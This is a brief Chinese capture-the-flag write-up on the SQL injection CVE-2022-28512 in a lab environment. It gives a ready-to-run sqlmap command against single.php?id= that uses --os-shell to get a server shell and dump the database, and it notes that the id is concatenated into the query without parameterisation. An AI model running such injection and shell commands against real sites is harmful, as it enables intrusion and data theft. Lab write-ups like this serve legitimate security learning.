CVE-2022-28512
运行环境:春秋云镜
根据题意找到注入点。
注入点id=x,直接通过sqlmap进行注入
sqlmap.py -u http://eci-2zeewd3dr3xicdul0rx3.cloudeci1.ichunqiu.com/single.php?id=4 --random-agent --batch --os-shell
找到数据库后再找表直接导出就可以看到flag了
- 代码审计 (single.php)
在拖源码的时候学习上可以直接拖单个文件。
这里的接受的id是直接拼接的,没有用到参数化导致出现问题
用chatgpt给的答案,用的是chatgpt3.5直接给全部给不了建议
活用chatgpt